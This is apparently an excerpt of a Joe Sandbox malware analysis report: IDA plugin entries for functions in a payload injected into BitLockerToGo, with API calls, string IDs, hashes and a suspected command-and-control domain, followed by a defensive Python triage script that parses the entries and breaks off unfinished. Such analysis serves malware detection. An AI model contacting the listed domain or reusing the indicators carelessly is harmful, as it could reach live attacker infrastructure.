                                                                                                                                                                          • Opcode Fuzzy Hash: ddec0c380ac517acfa482a69a21ea75a9b3f7248e8c135a75b7ab8a1ee6ed357
                                                                                                                                                                          • Instruction Fuzzy Hash: F112CDB4608340CFE324CF25D88176FBBE1FB86304F54892DE5899B251EB799809CB96
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: /U$MNOP$qC$r
                                                                                                                                                                          • API String ID: 0-3206768514
                                                                                                                                                                          • Opcode ID: 3537189cdea41c90d15e821171f8afb36a41bcdc7f0f1f8578abd451b47cf2a5
                                                                                                                                                                          • Instruction ID: 15317c2b67b06c9588edd17e9d89352afcab9f8ddcd52107280e1c02b600b630
                                                                                                                                                                          • Opcode Fuzzy Hash: 3537189cdea41c90d15e821171f8afb36a41bcdc7f0f1f8578abd451b47cf2a5
                                                                                                                                                                          • Instruction Fuzzy Hash: 6312257550C380DFC3048F2898A166FBBE2AF99314F189A6DF4D5873A2C739D905CB5A
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                          • Opcode ID: 3e1c03df17c1fed9ce7e26bf23ba8afee7171c343c2eaae075f166e9d044eff2
                                                                                                                                                                          • Instruction ID: f0566bba41c27eb8cdf32f8d29e862bd84efc57d896874c1dd1a7d1f40a3107a
                                                                                                                                                                          • Opcode Fuzzy Hash: 3e1c03df17c1fed9ce7e26bf23ba8afee7171c343c2eaae075f166e9d044eff2
                                                                                                                                                                          • Instruction Fuzzy Hash: 39B17FB810A3848BD3B4DF54C48978FBBE0BF85309F50896ED9995B251D7B8544C8F86
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP$MNOP$zx
                                                                                                                                                                          • API String ID: 0-3655013995
                                                                                                                                                                          • Opcode ID: de66a204e3f2a304b3f3d4ef51d08d61fa25a3dd1726051d81abdebcb3057646
• Instruction ID: 321856d8c7f84413d7627014aa985941360c7ad03aa8f4a648d5f22e12be0329
• Opcode Fuzzy Hash: de66a204e3f2a304b3f3d4ef51d08d61fa25a3dd1726051d81abdebcb3057646
• Instruction Fuzzy Hash: 3F3224757083509BE730DF15E881BABB7E2EBC4744F54882EE9898B381E7789841CB56
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID: MNOP$MNOP$uB
• API String ID: 2994545307-1542835258
• Opcode ID: 431241ef4b3c1d1b5e8a08b224de91a2f83affc30f322022e8a68d4e05fee315
• Instruction ID: cc9cb857e5cf7ac4a553318d6eeeaad38e1f3c4e5b4f88ee06e21b461ca5caa2
• Opcode Fuzzy Hash: 431241ef4b3c1d1b5e8a08b224de91a2f83affc30f322022e8a68d4e05fee315
• Instruction Fuzzy Hash: 3EF14036B143608BE324DF24E890B6B73D3ABD4301F698A2DD98597353E778DC418B96
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: )641$X$hxjw
• API String ID: 0-3547115419
• Opcode ID: fb613edcf8c060b9de73b57934339f11fcee25f3a2b76cb9bd02c217791f9776
• Instruction ID: 6c83c6b268e6d71724dc77d9fcbd8c094540905710322347e155282233bd9018
• Opcode Fuzzy Hash: fb613edcf8c060b9de73b57934339f11fcee25f3a2b76cb9bd02c217791f9776
• Instruction Fuzzy Hash: 3EE11B75A09350ABE310DF25DC41BABBBE5DFC5708F04882EF88997391D638D9058B97
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: "rD$3fa$bpD
• API String ID: 0-1262108915
• Opcode ID: 2a8a51890aaa34771e10f51c2cdda0cc3b12809cd2405160337c49134f0a8806
• Instruction ID: 13244d16c211bb2bcad218a3c81ced2cb02ffc49be0db0752046de5e5c6aa462
• Opcode Fuzzy Hash: 2a8a51890aaa34771e10f51c2cdda0cc3b12809cd2405160337c49134f0a8806
• Instruction Fuzzy Hash: 1BB1DD36608311CFD718CF28E99026AB7E2EBCA315F19897EE48687392D774DC02CB45
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: #L\R$,\CV$O4L7
• API String ID: 0-3787581059
• Opcode ID: a0b4944614542bf3a67a706ec71c8da98a22602492111a164afab445c67177d5
• Instruction ID: 6302cf0bee94a5ad652b07018c9a66b50cf7abdea086f3622bd106122652f469
• Opcode Fuzzy Hash: a0b4944614542bf3a67a706ec71c8da98a22602492111a164afab445c67177d5
• Instruction Fuzzy Hash: 319127B2A087018FC718CF69D89071BB7E2ABC4314F59863DE955CB392DB78D805CB85
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: MNOP$MNOP$B
• API String ID: 0-2013082597
• Opcode ID: 080050fa7587acd1f775651b2bd02c6b12d03c12fcd785cb6d4a9dfab969163c
• Instruction ID: 427106f293819a470450e0932dc21dc8bd031f23ee4c1c387aa55c50c85ec932
• Opcode Fuzzy Hash: 080050fa7587acd1f775651b2bd02c6b12d03c12fcd785cb6d4a9dfab969163c
• Instruction Fuzzy Hash: 8181AA75A08341CFD728CF15E89172FBBE2BBC8304F15896DE4995B3A1C7788905CB8A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: 2B$<=
• API String ID: 0-1898675190
• Opcode ID: 71a5038b86cab153bf550eff5ef4d684302044054bd1ddd42832d1e36cc30579
• Instruction ID: c902f626a9b2f13d1863b0adeac4f1cac601c152034ac004fa58715ea0083c5e
• Opcode Fuzzy Hash: 71a5038b86cab153bf550eff5ef4d684302044054bd1ddd42832d1e36cc30579
• Instruction Fuzzy Hash: 8EF126B5A083518FD714CF24E85166BBBE1AFDA304F58886EE4C597342D33CD909CB5A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: MNOP$
• API String ID: 0-2323356958
• Opcode ID: acb73d4741fa7ff19f24c221892feda4fa04e8f1d9badb7c6a748042e386b80c
• Instruction ID: b6dfaf9e55cd36c7b9c46e181ae13ac35b13c4755dd509cd8cc4a280139a5cd8
• Opcode Fuzzy Hash: acb73d4741fa7ff19f24c221892feda4fa04e8f1d9badb7c6a748042e386b80c
• Instruction Fuzzy Hash: 29B11571A083219BD7109F24D85276BB3E1EF92354F49892DE8D59B381E33CDD05C35A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: nGFA$IJK
• API String ID: 0-1749064823
• Opcode ID: 32ca8b0045ce1c4e5cc0fab50190c03de2ed0d81290e2cc004ad6fc4b2267251
• Instruction ID: 21d745270b471f1d4c01b6df011f032facef380b6dec7a8f7277d613ea3c0f42
• Opcode Fuzzy Hash: 32ca8b0045ce1c4e5cc0fab50190c03de2ed0d81290e2cc004ad6fc4b2267251
• Instruction Fuzzy Hash: C86104B1A0836187D7049F25D85132BBBF1AF92315F58886DE4C55B391E33DCA05C79A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: nGFA$IJK
• API String ID: 0-1749064823
• Opcode ID: e73a2807429df7b1cf928445aa40c9891d0ef5a7944cfa731405fd7e9330edba
• Instruction ID: f90c9582e09deafeb7b9d3ee4e8ee34dfd224ea527017794ff2a400d7b586160
• Opcode Fuzzy Hash: e73a2807429df7b1cf928445aa40c9891d0ef5a7944cfa731405fd7e9330edba
• Instruction Fuzzy Hash: 0C5114B1A0836187C7049F25D85232BBBF1AF92315F58886DE4C59B395E33DCA05C79A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: MNOP$uxVd
• API String ID: 0-3748827735
• Opcode ID: 3ce69d8cfed16dda00176407c52470a24fa2c3a1029f26bb4b6623db9ed90d46
• Instruction ID: f33051061eddafaf0435789cc0bde659aa8a6e4772a0d0252a87f7e630da701a
• Opcode Fuzzy Hash: 3ce69d8cfed16dda00176407c52470a24fa2c3a1029f26bb4b6623db9ed90d46
• Instruction Fuzzy Hash: 44414936604305ABEB24CF50DC81A6BB7E2EB84345F18842EF98583361E739DC95CB56
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: MNOP$MNOP
• API String ID: 0-1891600022
• Opcode ID: 7cff2fdadd37ce41135831ed0d1d104eda16a9ad87060848c7aee7f8be36cd33
• Instruction ID: 8284e26e75838f04d631bc8381044ea656cccf46fe6b2abe2970d53498321b1a
• Opcode Fuzzy Hash: 7cff2fdadd37ce41135831ed0d1d104eda16a9ad87060848c7aee7f8be36cd33
• Instruction Fuzzy Hash: 7D11D3742183408BD3598B2490A173FB7A1AF9A725F64771ED4D217352C338CC078B8A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: MNOP$MNOP
• API String ID: 0-1891600022
• Opcode ID: 7d3f96c1c78b8e52bc291fedaea7e954ff11efa6c3e3de2fd2e65b9a40faa164
• Instruction ID: 439d2e5539f73d91c69a3b3c8f5523551d8645751e1aefbde30932ea6b38cdf0
• Opcode Fuzzy Hash: 7d3f96c1c78b8e52bc291fedaea7e954ff11efa6c3e3de2fd2e65b9a40faa164
• Instruction Fuzzy Hash: 18F081307083508BD718CF15949162FB3E2ABCA725F599A2DD8A113762C778DC06C78A
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(0044AA60,00000000,00000001,0044AA50), ref: 00429199
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                                          • Opcode ID: b99b672fa0d1a0791a3e0b1aa2a04533db7b2d58bb39140e5c5c234f5807f35f
                                                                                                                                                                          • Instruction ID: 861df7cfd0ec1d8353c48d681c409214712c1da7751210e01cd4dba012062f5e
                                                                                                                                                                          • Opcode Fuzzy Hash: b99b672fa0d1a0791a3e0b1aa2a04533db7b2d58bb39140e5c5c234f5807f35f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7351D0B0740224ABDB20DF64DC86BB773A4EF85358F484959F9858B391E379EC05C72A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 0-783613192
                                                                                                                                                                          • Opcode ID: 254c08e4fc0af992e87096fdd0965cb0027b107f1de24035e27f8b1a4472a697
                                                                                                                                                                          • Instruction ID: d9b913763cde8ab17407b7b613ecdb6cd3e0a9648c947809f0fffd656cc1c9d0
                                                                                                                                                                          • Opcode Fuzzy Hash: 254c08e4fc0af992e87096fdd0965cb0027b107f1de24035e27f8b1a4472a697
                                                                                                                                                                          • Instruction Fuzzy Hash: 1ED11A76E10225CBCB14CF69D8805FFB7B2FF99750B5A805AD851AB351EB389C02CB94
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 2994545307-783613192
                                                                                                                                                                          • Opcode ID: 20cff1a09187d80d78f333ffd54a583299aa65ebedb1aa3fa9d58431950b325b
                                                                                                                                                                          • Instruction ID: 47f6a540994abda0ca95af1d4d8400089509cea07912db9806ada367cd1df040
                                                                                                                                                                          • Opcode Fuzzy Hash: 20cff1a09187d80d78f333ffd54a583299aa65ebedb1aa3fa9d58431950b325b
                                                                                                                                                                          • Instruction Fuzzy Hash: B071F471A083519BE724DE14C99072FB7E2ABC4310F58892EF5D587391D7B9DC418B8A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ^gPa
                                                                                                                                                                          • API String ID: 0-3338696370
                                                                                                                                                                          • Opcode ID: 3fa0d9d744f4436786475589ad33c25d082095f5f124f09c08b6816f13a77364
                                                                                                                                                                          • Instruction ID: cfc53848df0636c6e94bbd6cbcea6e1b620f617224d22baaa1d7e80c890d0e2e
                                                                                                                                                                          • Opcode Fuzzy Hash: 3fa0d9d744f4436786475589ad33c25d082095f5f124f09c08b6816f13a77364
                                                                                                                                                                          • Instruction Fuzzy Hash: 9561F1B1A083108BC710DF29E88166BBBF0FF92358F548A1DE5D54B391E379C508CB8A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: GlTf
                                                                                                                                                                          • API String ID: 0-474796513
                                                                                                                                                                          • Opcode ID: 2744b3095d9331d2d04f4965c2a23c01c5bee9fa425fc6daf1bc987e0f4e2324
                                                                                                                                                                          • Instruction ID: 74236ba9b3cc0a08cc7b30631b95950895f961cd6357d48f1186514dadc75d39
                                                                                                                                                                          • Opcode Fuzzy Hash: 2744b3095d9331d2d04f4965c2a23c01c5bee9fa425fc6daf1bc987e0f4e2324
                                                                                                                                                                          • Instruction Fuzzy Hash: 78518F217483608EC7208B2894C02ABBBD3DF96390F8E467BD5910B3D6D33D890DD399
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 0-783613192
                                                                                                                                                                          • Opcode ID: d70cf771bb6948a5b131557e404139c602a0556bf47dfb866429cda241d115a6
                                                                                                                                                                          • Instruction ID: 93aec46a1ed4ed383512bcc5e4c122afa6c5bbd32670e5a8da2dae97cf3d04b7
                                                                                                                                                                          • Opcode Fuzzy Hash: d70cf771bb6948a5b131557e404139c602a0556bf47dfb866429cda241d115a6
                                                                                                                                                                          • Instruction Fuzzy Hash: 5611D638B02220DBCF28CF94B89177E7372EB06B55FE450BDE80127212C7669D068B5C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 0-783613192
                                                                                                                                                                          • Opcode ID: b41f2ee70218142b522e4924884a307dd4c290964df95a35abad5bc98069a258
                                                                                                                                                                          • Instruction ID: 48c650eff71184f3e55c5af46ee2342b2f9423c61d45832d47eea70e80801630
                                                                                                                                                                          • Opcode Fuzzy Hash: b41f2ee70218142b522e4924884a307dd4c290964df95a35abad5bc98069a258
                                                                                                                                                                          • Instruction Fuzzy Hash: 4B112B75604300EBD7185B14A8A1B3F7362FB59716F54772EE85213253C379C802CB8E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: MNOP
                                                                                                                                                                          • API String ID: 0-783613192
                                                                                                                                                                          • Opcode ID: 1a43a43b2f3dc0f6071f364d717c6c612f66006a932fc4894e642f3eb89a6f32
                                                                                                                                                                          • Instruction ID: f52fc4fee7d4c401a98e41dc206cb85056432fe1198f9fa9d842320524490bb3
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a43a43b2f3dc0f6071f364d717c6c612f66006a932fc4894e642f3eb89a6f32
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F014730704350EBD7288F11AA5173F7392BBC671AF55492DE48127B82C378C801878A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: villagedguy.cyou
                                                                                                                                                                          • API String ID: 0-472080494
                                                                                                                                                                          • Opcode ID: ad180c49b8e67a77647949eb261cd3a3771dc2d290259a89548967df233e1282
                                                                                                                                                                          • Instruction ID: e2342cbf2de96edc5457a879679271ee1ad9e8d7e4fc9f35044ddc2c6406840f
                                                                                                                                                                          • Opcode Fuzzy Hash: ad180c49b8e67a77647949eb261cd3a3771dc2d290259a89548967df233e1282
                                                                                                                                                                          • Instruction Fuzzy Hash: 25E04FA595511086C3684F04C9A1173B270FF23355718383BECC6AB7A1F2789804C39D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 525e470eb9cfcfce4e6792d1b173326834ffe4469737fbfc6aa4b07063161c37
                                                                                                                                                                          • Instruction ID: 27c6a332ff83b37ab2b545a79f61b65a4de86583289330a373b1913817e4a747
                                                                                                                                                                          • Opcode Fuzzy Hash: 525e470eb9cfcfce4e6792d1b173326834ffe4469737fbfc6aa4b07063161c37
                                                                                                                                                                          • Instruction Fuzzy Hash: A0F1CD3A609201CFD748CF28D8A076A77E2BBC9324F19893DE85A97391D734ED45CB85
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                          • String ID: $#$+$+$1$5$:$R$y
                                                                                                                                                                          • API String ID: 2610073882-2489440055
                                                                                                                                                                          • Opcode ID: f0a429a189294ed03afcd11ccc086267a9569da1e652b7a0cc2ff71237374a81
                                                                                                                                                                          • Instruction ID: 265269d8252d7e8f7c9ca00c1f24ad95b5395bdf85d5f6e6ceb7d4d2e0c635a8
                                                                                                                                                                          • Opcode Fuzzy Hash: f0a429a189294ed03afcd11ccc086267a9569da1e652b7a0cc2ff71237374a81
                                                                                                                                                                          • Instruction Fuzzy Hash: 2741FA6150CBC18ED3329B38844839FBFD16BA6314F188E9DE5E58B2E2C775810ADB57
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DrivesLogical
                                                                                                                                                                          • String ID: Gt$L_
                                                                                                                                                                          • API String ID: 999431828-1375530031
                                                                                                                                                                          • Opcode ID: 1a6be90d356bee28258b8c4b1b5cbc905d3916c5a1710fa8385e560bdaae87ba
                                                                                                                                                                          • Instruction ID: 71d07980d51fba32441b4c7d850694f1eaa7d290076b2809f47af00d58fe155e
                                                                                                                                                                          • Opcode Fuzzy Hash: 1a6be90d356bee28258b8c4b1b5cbc905d3916c5a1710fa8385e560bdaae87ba
                                                                                                                                                                          • Instruction Fuzzy Hash: EE5151B46193819FD310DF65A99061BBBF0EF96344F848A2DE9D58B350D3788905CB8B
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowExW.USER32(00000000,?,Y~,00000000), ref: 00420A82
                                                                                                                                                                          • FindWindowExW.USER32(00000000,00000000,Y~,00000000), ref: 00420B62
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindWindow
                                                                                                                                                                          • String ID: Y~
                                                                                                                                                                          • API String ID: 134000473-649834763
                                                                                                                                                                          • Opcode ID: d624f99e04a35acac8017a6fe6ab58c5cb885d9f92a1c585014e816abfd08046
                                                                                                                                                                          • Instruction ID: 409c0a10e8c2f64c9234f1f3cee7d592946007bc94705be4b9665bc431326c51
                                                                                                                                                                          • Opcode Fuzzy Hash: d624f99e04a35acac8017a6fe6ab58c5cb885d9f92a1c585014e816abfd08046
                                                                                                                                                                          • Instruction Fuzzy Hash: E731927555C3908AD378CF51D4867CBFBA0EFAA314F048A2CD9D85B242D7B919058FC6
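Every function entry above comes from the same memory dump source: the region at offset 00400000 inside the BitLockerToGo snapshot, which the report parses as a PE. That is the payload the sample injected into a foreign process, and the entries are what remains useful for triage: the API calls with their addresses (two FindWindowExW calls at 00420A82 and 00420B62), Joe Sandbox's normalised API IDs (FindWindow, DrivesLogical, Variant$ClearInit) and the opcode and instruction hashes for similarity matching. The script below is an added example for this page, not Joe Sandbox code. It parses entries in this exact listing format, decodes the .sdmp name and flags why the dump source itself looks like injected code. The assumption it makes is the field layout of the .sdmp name: the fourth dotted field is the base address (it matches the Offset value printed beside it), the fifth the page protection and the seventh the region type, interpreted with the winnt.h constants; the remaining fields are left undecoded. The sample text is copied from the listing above and is the only input the script needs.

```python
"""Triage helper for Joe Sandbox 'IDA Plugin' function entries.

Added example; not Joe Sandbox code. The .sdmp field positions used in
decode_sdmp() are an assumption (base address, protection, region type).
"""
import re
from dataclasses import dataclass, field

# winnt.h memory constants used to read the decoded .sdmp fields.
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

# Sample input: two entries (plus the tail of a preceding one), copied
# from the report listing so the parser can be exercised offline.
SAMPLE = """\
• Instruction Fuzzy Hash: EE5151B46193819FD310DF65A99061BBBF0EF96344F848A2DE9D58B350D3788905CB8B
APIs
• FindWindowExW.USER32(00000000,?,Y~,00000000), ref: 00420A82
• FindWindowExW.USER32(00000000,00000000,Y~,00000000), ref: 00420B62
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: FindWindow
• String ID: Y~
• API String ID: 134000473-649834763
• Opcode ID: d624f99e04a35acac8017a6fe6ab58c5cb885d9f92a1c585014e816abfd08046
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: DrivesLogical
• String ID: Gt$L_
• Opcode ID: 1a6be90d356bee28258b8c4b1b5cbc905d3916c5a1710fa8385e560bdaae87ba
"""

API_RE = re.compile(r"^• (?P<api>[\w.]+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^• Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
KV_RE = re.compile(r"^• (?P<key>[^:]+): (?P<val>.*)$")
KEPT_KEYS = {"api_id", "string_id", "opcode_id", "snapshot_file"}


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)  # (api name, raw args, call site)
    source_file: str = ""
    base_pe: bool = False
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""
    snapshot_file: str = ""


def parse_entries(text):
    """Split the listing into one FunctionEntry per 'APIs' header."""
    entries, cur = [], None
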